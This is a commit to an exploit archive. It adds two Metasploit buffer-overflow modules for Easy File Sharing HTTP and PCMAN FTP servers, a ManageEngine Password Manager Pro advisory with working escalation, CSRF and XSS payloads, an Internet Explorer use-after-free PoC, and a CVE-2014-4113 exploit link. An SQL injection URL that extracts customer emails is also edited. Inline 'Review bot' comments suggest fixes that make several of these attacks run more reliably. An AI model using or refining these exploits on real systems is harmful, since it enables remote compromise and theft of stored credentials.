DB: 2016-04-06
5 new exploits
Easy File Sharing HTTP Server 7.2 SEH Overflow
PCMAN FTP Server Buffer Overflow - PUT Command
Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)
ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities
Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)
parent 13d072b592
commit 60fd0ef490
7 changed files with 599 additions and 3 deletions
@ -15218,6 +15218,8 @@ id,file,description,date,author,platform,type,port
17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow",2011-07-07,metasploit,windows,local,0
17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk <= 8.0.0.12 Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0
17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal Vulnerability",2011-07-08,"SecPod Research",hardware,remote,0
39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 SEH Overflow",2016-04-05,metasploit,windows,remote,80
39662,platforms/windows/remote/39662.rb,"PCMAN FTP Server Buffer Overflow - PUT Command",2016-04-05,metasploit,windows,remote,21
17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - XSS Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0
17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution Exploit",2011-07-08,wofeiwo,php,webapps,0
17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - (.ZIP) Buffer Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,local,0
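Review bot: rows 39661 and 39662 are inserted between ids 17507 and 17508 rather than appended after the last entry, where the second hunk of this same commit adds 39663, 39664 and 39666; files.csv is otherwise kept in ascending id order, so move the two rows to the end of the file (after the 39666 line) to keep the index sorted and the next csv merge conflict-free.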
@ -35883,3 +35885,6 @@ id,file,description,date,author,platform,type,port
39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0
39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 and 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0
39663,platforms/windows/dos/39663.html,"Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0
39664,platforms/jsp/webapps/39664.txt,"ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities",2016-04-05,S3ba,jsp,webapps,7272
39666,platforms/windows/local/39666.txt,"Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0
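Review bot: the 39666 row names only the bulletin (MS14-058) although 39666.txt in this same commit identifies the bug as CVE-2014-4113 in both of its source links; put the CVE in the description so a search on either identifier finds the entry. Id 39665 is skipped in this run (39663, 39664, 39666) while 39666.txt points at docs/39665.pdf; if the number went to the mirrored paper, say so in the commit message so nobody goes looking for a missing exploit.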
388
platforms/jsp/webapps/39664.txt
Executable file
@ -0,0 +1,388 @@
[Systems Affected]
Product : ManageEngine Password Manager Pro
Company : ZOHO Corp.
Build Number : 8.1 to 8.3 and probably earlier versions
Affected Versions : 8102 to 8302 and probably earlier versions


[Product Description]
Password Manager Pro is a secure vault for storing and managing
shared sensitive information such as passwords, documents and digital
identities of enterprises.


[Vulnerabilities]
Multiple vulnerabilities were identified within this application:
1- Stored XSS in /AddMail.ve
2- Privilege escalation in /EditUser.do
3- Business Login Bypass in /EditUser.do
4- Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
5- Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
6- Resource's user enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp
7- Password Bruteforce for resources accounts in
/jsp/xmlhttp/AjaxResponse.jsp
8- Cross-Site Request Forgery


[Advisory Timeline]
17/07/2015 - Discovery and vendor notification
17/07/2015 - ManageEngine responsed that they will notify their
development team
13/10/2015 - ManageEngine informed that they have fixed these issue
14/10/2015 - Fixed Password Manager Pro build version 8300 has been released
15/10/2015 - Test on Beta build version 8300 was performed and
confirm the fix of these issues 2, 4, 7 and part of issue 8
02/11/2015 - ManageEngine ask more time to fix the remaining issues
before making this public
29/12/2015 - ManageEngine contacted for an update - No reply
12/01/2016 - ManageEngine contacted for an update - No reply
08/02/2016 - ManageEngine contacted for an update - small update provided
12/02/2016 - Last communication from ManageEngine
04/04/2016 - Public Disclosure


[Patch Available]
Password Manager Pro Release 8.3 (8300) (Released on October, 2015)
fix issues #2, #4, #7 and partially #8
Password Manager Pro Release 8.3 (8303) (Released on December 2015)
fix issues #1, #3, #5 and #6


[Exploit]
There is an exploit available that takes advantage of the Privilege
Escalation vulnerability (Issue #2) and elevates a regular user to
SuperAdmin, and then downloads the passwords and files stored within
the application. The exploit code is available here
- https://github.com/s3bap3/pmp-exploit


[Description of Vulnerabilities]

(1) Stored XSS in /AddMail.ve.
This functionality is under the personal accounts stored in the
application. However, as the page is also vulnerable to CSRF, an html
form can be forged to create a personal account an exploit the XSS
vulnerability. The affected parameter is "password", and the POST
message to send is something like this

[PoC]
POST /AddMail.ve?SUBREQUEST=XMLHTTP HTTP/1.1

service=1&serviceurl=1&loginname=1&password=<!--+--+--><script>alert%28'XSS'%29;<%2fscript><!--+--+-->&spassword=&tags=1&Rule=Low&FORWARDURL=MailAccount.cc%3F


(2) Privilege escalation in /EditUser.do that allows to do 2 things.
a- Hijack user's sessions by changing their emails and accessing
the forgot password functionality.
The affected parameter is "EMAIL" from the /EditUser.do web page.
Any user (even PASSWORD USER's role) could send a craft POST method
like the one below in order to change the user email address, which is
being used to generate a new user password when the previous one was
forgotten. The only attribute that needs to be changed from one
request to another is the LOGINID, which is a sequence number that
represent the User numeric ID.

b- Escalate privileges by changing the user account status from
Password user to superadmin.
By forging a similar request it is possible to raise our own
privileged to become a privileged user. For example, the parameter
"ROLE" can be changed to "Password Auditor" "Password Administrator"
or even "Administrator " and become it. It is also possible to become
a superAdmin by changing the parameter "superAdmin" from false to
true. This will allow us to take control of the application and all
the passwords stored on it. In order to become superAdmin, the user
role needs to be Administrator. Both can be achieved by forging the
same request. In this scenario there are two parameters to be aware
of.
- USERID and LOGINID is the numeric account id to which the
superadmin attribute will be granted (could be obtained from the login
reply)
- USER is the username to which the superadmin attribute will be granted

[PoC]
POST /EditUser.do?SUBREQUEST=true HTTP/1.1
Content-Type: multipart/form-data;
boundary=---------------------------20780287114832

-----------------------------20780287114832
Content-Disposition: form-data; name="isloginusersa"

false
-----------------------------20780287114832
Content-Disposition: form-data; name="superadminscope"

true
-----------------------------20780287114832
Content-Disposition: form-data; name="SERVERPORT"

7272
-----------------------------20780287114832
Content-Disposition: form-data; name="OLDROLE"

Administrator
-----------------------------20780287114832
Content-Disposition: form-data; name="USERID"

4
-----------------------------20780287114832
Content-Disposition: form-data; name="LOGINID"

4
-----------------------------20780287114832
Content-Disposition: form-data; name="USER"

username
-----------------------------20780287114832
Content-Disposition: form-data; name="OLDLANG"

en
-----------------------------20780287114832
Content-Disposition: form-data; name="EMAIL"

pwned@user.com
-----------------------------20780287114832
Content-Disposition: form-data; name="ROLE"

Administrator
-----------------------------20780287114832
Content-Disposition: form-data; name="superAdmin"

true
-----------------------------20780287114832
Content-Disposition: form-data; name="Rule"

Strong
-----------------------------20780287114832
Content-Disposition: form-data; name="DEPT"


-----------------------------20780287114832
Content-Disposition: form-data; name="LOCATION"


-----------------------------20780287114832
Content-Disposition: form-data; name="mobileaccess"

enable
-----------------------------20780287114832
Content-Disposition: form-data; name="UserCert"; filename=""
Content-Type: application/octet-stream


-----------------------------20780287114832
Content-Disposition: form-data; name="lang_code"

en
-----------------------------20780287114832--


(3) Business Login Bypass in /EditUser.do
The application allows only the creation of certain amount of
Administrator, based on the licences. However it is possible to create
more administrators. In order to exploit this go to the user
administration page, and edit a user id. Save the edition without
making any modification and intercept that POST message. Modify both
parameters, "OLDROLE" and "ROLE" with the role "Administrator", and
the user role will be changed to this one. Every user can be converted
to an administrator even if the license does not allow that much. The
application only check the amount of administrators when "ROLE" is
Administrator but "OLDROLE" is another one.


(4) Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
Every time a password for a user account or resource's user account
is being changed, a request is sent to this path in order to validate
the password against the password policy. Despite the fact the the
password is being sent in the URL (this means it could be logged in
any proxy or even in the browser), the policy against the password is
being evaluated could by changed by modifying the parameter "Rule"
from the value it currently has to "Low", in order to be evaluated
with a lower policy. For example:

[PoC]
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&ACCID=5
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&AccName=5


(5) Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
When an administrator creates a Password Reset Listener, another
administrator needs to approve it. The same happens when a Listener
needs to be suspended. However this could be bypassed by creating and
approving the listener by the same administrator. This could be
achieved by forging a GET request like the following. The only
parameter that needs to be changed is the "LISTENERID" which is a
sequence number that represents the Listener.

[PoC]
Listener Approval
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=false&LISTENERTYPE=1&SUBREQUEST=XMLHTTP

Listener Suspension
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=true&LISTENERTYPE=1&SUBREQUEST=XMLHTTP


(6) Resource's users enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp.
It is possible to enumerate resource's user accounts by forging a
GET request as follows. This URL allows, if a user has access, to
retrieve the account password. However if a user does not have access,
the error message changes if the user exists or not. The only
parameters that needs to be modified are "Resource" and "Account".

[PoC]
https://192.168.56.101:7272/jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp?RequestType=PasswordRetrived&resource=admin+resource&account=admin

The error messages identifies if the account exists for that resource.
Account exists: ____ACCESS___DENIED__
Resource/Account does not exists: FAILURE


(7) Password Bruteforce for resources accounts in /jsp/xmlhttp/AjaxResponse.jsp
It is possible to enumerate resource's user passwords by forging a
GET request as follows. This URL is used in order to validate a user
password against the password policy specified. By being able to
change the password policy it is possible to use the "Low" policy
which does not allow to reuse the password that is currently setup for
the user. If an error message that the password could not be reused
appears, that indicate that the password is the current password for
that account.
The only parameters that needs to be modified are "Password" and
"ACCID", and ensure that the password policy "Rule" parameter is set
to low.

[PoC]
https://192.168.56.101:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=2&Rule=Low&ACCID=8

The error messages identifies if the password is correct or not
for every user account.
Password matches: "Password cannot be same as last 1 passwords"
Password does not match: "SUCCESS"
Account ID does not exists: "Error in validating password policy"


(8) Cross-Site Request Forgery
The application is vulnerable to Cross-Site Request Forgery, which
by sending specific POST messages it is possible create a user in the
system (1), elevate privileges for a user (2)(4), and store a XSS in
the user's personal passwords (3). Below are two PoC

[PoC]
User Creation
<html>
<body>
<form method="post"
action="https://192.168.0.3:7272/AddUser.do"
enctype="multipart/form-data">
<input value="true" name="superadminscope"
type="hidden"><input value="true" type="hidden">
<input value="true" name="isloginusersa"
type="hidden"><input value="true" type="hidden">
<input value="hacker" name="fname" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="lname" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="user" type="hidden"><input
value="true" type="hidden">
<input value="same" name="rbutton" type="hidden"><input
value="true" type="hidden">
<input value="Strong" name="Rule" type="hidden"><input
value="true" type="hidden">
<input value="" name="spassword" type="hidden"><input
value="true" type="hidden">
<input value="hacker@hacker.com" name="mail"
type="hidden"><input value="true" type="hidden">
<input value="Password User" name="ROLE"
type="hidden"><input value="true" type="hidden">
<input value="false" name="superAdmin"
type="hidden"><input value="true" type="hidden">
<input value="" name="dept" type="hidden"><input
value="true" type="hidden">
<input value="false" name="location"
type="hidden"><input value="true" type="hidden">
<input value="enable" name="mobileaccess"
type="hidden"><input value="true" type="hidden">
<input value="en" name="lang_code" type="hidden"><input
value="true" type="hidden">
<input type="submit" value="Submit">
</form>
</body>
</html>

Privilege Escalation
<html>
<body>
<form method="post"
action="https://192.168.0.3:7272/EditUser.do?SUBREQUEST=true"
enctype="multipart/form-data">
<input value="true" name="isloginusersa"
type="hidden"><input value="true" type="hidden">
<input value="true" name="superadminscope"
type="hidden"><input value="true" type="hidden">
<input value="Administrator" name="OLDROLE"
type="hidden"><input value="true" type="hidden">
<input value="613" name="USERID" type="hidden"><input
value="true" type="hidden">
<input value="613" name="LOGINID" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="USER" type="hidden"><input
value="true" type="hidden">
<input value="en" name="OLDLANG" type="hidden"><input
value="true" type="hidden">
<input value="hacker@hacker.com" name="EMAIL"
type="hidden"><input value="true" type="hidden">
<input value="Administrator" name="ROLE"
type="hidden"><input value="true" type="hidden">
<input value="true" name="superAdmin"
type="hidden"><input value="true" type="hidden">
<input value="Strong" name="Rule" type="hidden"><input
value="true" type="hidden">
<input value="" name="DEPT" type="hidden"><input
value="true" type="hidden">
<input value="" name="LOCATION" type="hidden"><input
value="true" type="hidden">
<input value="enable" name="mobileaccess"
type="hidden"><input value="true" type="hidden">
<input value="en" name="lang_code" type="hidden"><input
value="true" type="hidden">
<input type="submit" value="Submit">
</form>
</body>
</html>

Stored XSS
<html>
<body>
<form name="badform" method="post"
action="https://192.168.0.3:7272/AddMail.ve?SUBREQUEST=XMLHTTP"
accept-charset="UTF-8">
<input type="hidden" name="service" value="1" />
<input type="hidden" name="serviceurl" value="1" />
<input type="hidden" name="loginname" value="1" />
<input type="hidden" name="password" value="<!-- --
--><script>alert('XSS');</script><!-- -- -->" />
<input type="hidden" name="spassword" value="" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="Rule" value="Low" />
<input type="submit" value="Submit">
</form>
</body>
</html>

Privilege Escalation
<html>
<body>
<form name="badform" method="post"
action="https://192.168.0.3:7272/ChangeRoles.ve?SUBREQUEST=XMLHTTP"
accept-charset="UTF-8">
<input type="hidden" name="SKIP_PREF" value="true" />
<input type="hidden" name="Admin" value="hacker" />
<input type="hidden" name="FORWARDURL"
value="UserTabView.cc%3F" />
<input type="submit" value="Submit">
</form>
</body>
</html>

--
S3ba
@s3bap3
http://linkedin.com/in/s3bap3
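Review bot: the cross-references in section (8) use a numbering that differs from the [Vulnerabilities] list: it cites user creation as (1), privilege escalation as (2)(4) and the stored XSS as (3), while in the list the XSS is #1, the EditUser.do escalation is #2 and CSRF itself is #8, and the [Patch Available] section uses the list numbering; reword that sentence to the list's numbers (or say the figures index the PoC forms that follow) so a reader can check which CSRF vectors 8300 and 8303 close. The same section announces "two PoC" but gives four, and the fourth, the form posting to "ChangeRoles.ve?SUBREQUEST=XMLHTTP" with "Admin=hacker", is not covered by any of the eight issues or by the fixed-build list, so nobody can tell from this text whether it is fixed at all. Smaller points: the second URL under (4) repeats "AccName=5" where the first has "ACCID=5", which reads like a copy error; the [Exploit] section points at an external GitHub repository without a commit hash, so the archived text cannot later be matched to what that repository serves; and "Business Login Bypass" (issues list and section 3) and "responsed" (timeline) are typos for "Business Logic Bypass" and "responded".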
@ -13,15 +13,15 @@
------------------------------------------------------------------------
vulnerable url:

/templates1/view_product.php?product=3D
/templates1/view_product.php?product=

Example:

http://localhost/templates1/view_product.php?product=3D[SQL INJECTION]
http://localhost/templates1/view_product.php?product=[SQL INJECTION]

Get an Mail from the Customers Table:

http://localhost/templates1/view_product.php?product=3D94746%20AND%20%28SEL=
http://localhost/templates1/view_product.php?product=94746%20AND%20%28SEL=
ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%=
2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2=
CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%2=
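Review bot: this hunk rewrites "=3D" to "=" on three lines but leaves the quoted-printable soft line breaks untouched: the surrounding lines still end in a bare "=" ("%28SEL=", "%2C99%=", "%29%2=", "customers%2=") that a decoder would join to the following line, so the injection URL remains split into fragments that do not paste as one request. Decode the whole file as quoted-printable (Python's quopri module does it in one call) rather than patching the "=3D" sequences by hand, and check the rest of the file for the same encoding residue.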
42
platforms/windows/dos/39663.html
Executable file
@ -0,0 +1,42 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=691

Minimized PoC:
-->

<svg xmlns="http://www.w3.org/2000/svg" xlink="http://www.w3.org/1999/xlink">
<pattern id="outer"><rect id="rect"><pattern id="inner"></pattern></rect></pattern>
<script><![CDATA[
function handler() {
inner.setAttribute("viewBox");
}
outer.addEventListener("DOMAttrModified", function () { handler(); });
doc = document.implementation.createDocument("", "", null);
doc.adoptNode(rect.attributes[0]);
]]></script>
</svg>

<!--
Backtrace for reference:

2:052:x86> k 10
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0bb14b64 6ad180b8 vrfcore!VerifierStopMessageEx+0x571
0bb14b88 67fec434 vrfcore!VerifierDisableVerifier+0x748
0bb14bdc 67fea3dc verifier_67fe0000!VerifierStopMessage+0x74
0bb14c40 67fe733d verifier_67fe0000!AVrfpDphReportCorruptedBlock+0x10c
0bb14ca4 67fe7495 verifier_67fe0000!AVrfpDphFindBusyMemoryNoCheck+0x7d
0bb14cc8 67feb651 verifier_67fe0000!AVrfpDphFindBusyMemory+0x15
0bb14ce0 67ff0b12 verifier_67fe0000!AvrfpDphCheckPageHeapAllocation+0x41
0bb14cf0 67f93246 verifier_67fe0000!VerifierCheckPageHeapAllocation+0x12
0bb14d4c 60dca53f vfbasics+0x13246
0bb14d68 604cce4e MSHTML!MemoryProtection::HeapFree+0x46
0bb14d70 60b07866 MSHTML!ProcessHeapFree+0x10
0bb14d88 60baac6b MSHTML!CSVGHelpers::SetAttributeStringAndPointer<CRectF,CSVGRe
ct>+0xb6
0bb14de8 60e18b69 MSHTML!PROPERTYDESC::HandleStringProperty+0x110
0bb14e14 607e30e6 MSHTML!PROPERTYDESC::CallHandler+0x855996
0bb14e54 60b83323 MSHTML!CElement::SetAttributeFromPropDesc+0xbe
0bb14ee4 607e2f44 MSHTML!CElement::ie9_setAttributeNSInternal+0x2ee
-->
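Review bot: the backtrace in the trailing comment was captured under Application Verifier page heap (the vrfcore!VerifierStopMessageEx and AVrfpDphReportCorruptedBlock frames show the verifier rejecting the block handed to HeapFree from CSVGHelpers::SetAttributeStringAndPointer), so the header comment should state that the PoC was reproduced with page heap enabled; without it that free goes through silently and a tester may report a non-crash. Two things worth a line in the same comment: inner.setAttribute("viewBox") with a single argument is accepted by the IE DOM but is a TypeError in standards-mode DOM implementations, so the file is IE-only by construction, and the root element declares xlink= rather than xmlns:xlink=, which is harmless here because no xlink attribute is used but will confuse anyone who tries to extend the PoC.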
11
platforms/windows/local/39666.txt
Executable file
@ -0,0 +1,11 @@
Sources:
https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf
https://github.com/sam-b/CVE-2014-4113

EDB Mirror: https://www.exploit-db.com/docs/39665.pdf


Trigger and exploit code for CVE-2014-4113:

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39666.zip
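Review bot: the file points at 39666.zip in the separate exploit-database-bin-sploits repository with no checksum; that archive is the actual trigger and exploit code, fetched over a raw URL from another repo, so record a SHA-256 of the zip here so a reader can verify that what they downloaded is what was reviewed when this entry was added. The GitHub source (sam-b/CVE-2014-4113) is likewise unpinned; a commit hash would keep the entry reproducible if that repository changes.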
70
platforms/windows/remote/39661.rb
Executable file
@ -0,0 +1,70 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow',
'Description' => %q{
This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.
},
'Author' => 'Starwarsfan2099 <starwarsfan2099[at]gmail.com>',
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '39008' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 390,
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ],
],
'DefaultOptions' => {
'RPORT' => 80
},
'DisclosureDate' => 'Dec 2 2015',
'DefaultTarget' => 0))
end

def print_status(msg='')
super("#{peer} - #{msg}")
end

def exploit
connect
print_status("Sending exploit...")
sploit = "GET "
sploit << rand_text_alpha_upper(4061)
sploit << generate_seh_record(target.ret)
sploit << make_nops(19)
sploit << payload.encoded
sploit << make_nops(7)
sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20)
sploit << " HTTP/1.0\r\n\r\n"
sock.put(sploit)
print_good("Exploit Sent")
handler
disconnect
end
end
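Review bot: 'DefaultOptions' appears twice in the update_info hash, once with 'EXITFUNC' => 'thread' and again with 'RPORT' => 80; Ruby keeps the later duplicate key and drops the earlier one (with only a warning), so the EXITFUNC setting never reaches the payload and the module runs with the default exit technique. Merge the two into one 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'RPORT' => 80 }. Also the Description says "Easy File Sharing FTP Server 7.2" while the Name, the target and the exploit body (a GET request on port 80) all refer to the HTTP server; and the filler expression subtracts 20 and 20 for nop sleds that are actually 19 and 7 bytes, so the request comes out 14 bytes short of the 4500 the arithmetic implies, which is harmless if the overflow does not depend on total length but deserves a comment so the next person does not "fix" it into a non-working offset.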
80
platforms/windows/remote/39662.rb
Executable file
@ -0,0 +1,80 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Ftp

def initialize(info = {})
super(update_info(info,
'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command',
'Description' => %q{
This module exploits a buffer overflow vulnerability found in the PUT command of the
PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
credientials are enabled.
},
'Author' =>
[
'Jay Turla', # Initial Discovery -- @shipcod3
'Chris Higgins' # msf Module -- @ch1gg1ns
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '37731'],
[ 'OSVDB', '94624']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0A\x0D",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 English',
{
'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll
'Offset' => 2007
}
],
],
'DisclosureDate' => 'Aug 07 2015',
'DefaultTarget' => 0))
end

def check
connect_login
disconnect

if /220 PCMan's FTP Server 2\.0/ === banner
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end


def exploit
connect_login

print_status('Generating payload...')
sploit = rand_text_alpha(target['Offset'])
sploit << [target.ret].pack('V')
sploit << make_nops(16)
sploit << payload.encoded

send_cmd( ["PUT", sploit], false )
disconnect
end

end
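Review bot: check returns Exploit::CheckCode::Safe whenever the banner does not match /220 PCMan's FTP Server 2\.0/, but a non-matching greeting (customised, suppressed, or a different product on the port) does not establish that the host is safe; return Unknown in that branch and reserve Safe for a positively identified non-vulnerable version. The same regex accepts every 2.0.x build while the Description pins v2.0.7, and neither the Name nor the files.csv description carries a version, so add it to both so the entry lines up with the EDB 37731 advisory it references. Minor: "credientials" in the Description.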